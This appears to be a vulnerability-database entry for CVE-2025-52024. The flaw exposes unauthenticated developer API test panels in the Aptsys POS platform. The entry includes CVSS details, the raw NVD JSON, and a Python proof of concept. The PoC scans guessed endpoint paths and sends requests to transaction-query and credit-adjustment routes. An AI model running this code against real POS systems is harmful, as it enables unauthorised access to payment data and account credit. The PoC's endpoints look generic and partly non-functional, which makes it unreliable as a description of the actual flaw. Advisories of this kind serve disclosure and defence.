Security Vulnerability Report
CVE-2025-52024 CVSS 9.4 CRITICAL

CVE-2025-52024

Published: 2026-01-23 21:15:51
Last Modified: 2026-02-11 19:23:52

Description

A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are accessible in production environments with no authentication or session validation. This grants any external actor the ability to discover, test, and execute API endpoints that perform critical functions including but not limited to user transaction retrieval, credit adjustments, POS actions, and internal data queries.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:* - VULNERABLE
Aptsys POS Platform Web Services <= 2025-05-28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
import re

# CVE-2025-52024 PoC - Aptsys POS Platform Unauthorized API Access
# Target: Aptsys POS Platform Web Services (versions before 2025-05-28)


def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-52024
    Tests for exposed API testing endpoints
    """
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-52024 - Unauthenticated API Test Panel Access\n")

    # Common API test endpoint paths to test
    test_paths = [
        "/api-test",
        "/api/test",
        "/debug/api",
        "/internal/api",
        "/services/api",
        "/admin/api-console",
        "/web-services/test",
        "/pos/api-test",
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    vulnerable_endpoints = []

    for path in test_paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                # Check if response contains API test interface indicators
                content = response.text.lower()
                indicators = ['api', 'service', 'form', 'submit', 'test', 'endpoint']
                matches = sum(1 for ind in indicators if ind in content)
                if matches >= 3:
                    print(f"[+] VULNERABLE: {url}")
                    print(f"    Status: {response.status_code}")
                    print(f"    Content-Length: {len(response.text)}")
                    vulnerable_endpoints.append(url)
                    # Extract service list if available
                    if 'service' in content or 'endpoint' in content:
                        print(f"    [+] API test interface detected - services may be enumerated")
                else:
                    print(f"[-] Not vulnerable: {url}")
            else:
                print(f"[-] Endpoint not accessible: {url} (Status: {response.status_code})")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error accessing {url}: {e}")

    if vulnerable_endpoints:
        print(f"\n[!] Target is VULNERABLE to CVE-2025-52024")
        print(f"[!] Found {len(vulnerable_endpoints)} exposed API test endpoints")
        print(f"[!] Attackers can access internal API functions without authentication")
        return True
    else:
        print(f"\n[-] Target appears NOT vulnerable")
        return False


def exploit_api_endpoints(base_url, endpoint):
    """
    Attempt to enumerate and interact with exposed API endpoints
    Note: This is for authorized security testing only
    """
    print(f"\n[*] Enumerating API services at: {endpoint}")

    # Common API operations that could be exploited
    test_operations = [
        ("/transactions/query", "POST", {"user_id": "*"}),
        ("/credit/adjust", "POST", {"amount": 0}),
        ("/pos/action", "POST", {"operation": "status"}),
        ("/internal/query", "GET", {}),
    ]

    for path, method, data in test_operations:
        url = base_url + path
        try:
            if method == "GET":
                resp = requests.get(url, timeout=10, verify=False)
            else:
                resp = requests.post(url, json=data, timeout=10, verify=False)
            if resp.status_code in [200, 201]:
                print(f"[+] API accessible: {path} - Status: {resp.status_code}")
                print(f"    Response preview: {resp.text[:200]}...")
        except requests.exceptions.RequestException:
            # Network/HTTP errors are ignored; only request failures are swallowed,
            # so Ctrl-C still interrupts the loop (the original used a bare except)
            pass


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-52024-poc.py <target_url>")
        print("Example: python cve-2025-52024-poc.py https://pos.example.com")
        sys.exit(1)
    target = sys.argv[1]
    check_vulnerability(target)

References

http://aptsys.com (Product)
https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 (Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52024", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.610", "lastModified": "2026-02-11T19:23:51.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are accessible in production environments with no authentication or session validation. This grants any external actor the ability to discover, test, and execute API endpoints that perform critical functions including but not limited to user transaction retrieval, credit adjustments, POS actions, and internal data queries."}, {"lang": "es", "value": "Una vulnerabilidad existe en el módulo de servicios web de la plataforma Aptsys POS hasta el 28-05-2025, lo que expone herramientas internas de prueba de API a usuarios no autenticados. Al acceder a URL específicas, a un atacante se le presenta un índice estilo directorio que lista todos los servicios backend y servicios web POS disponibles, cada uno con un formulario HTML para enviar entradas de prueba. Estos paneles están destinados para uso de desarrolladores, pero son accesibles en entornos de producción sin autenticación ni validación de sesión. Esto otorga a cualquier actor externo la capacidad de descubrir, probar y ejecutar endpoints de API que realizan funciones críticas, incluyendo, entre otros, recuperación de transacciones de usuario, ajustes de crédito, acciones de POS y consultas de datos internas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-425"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}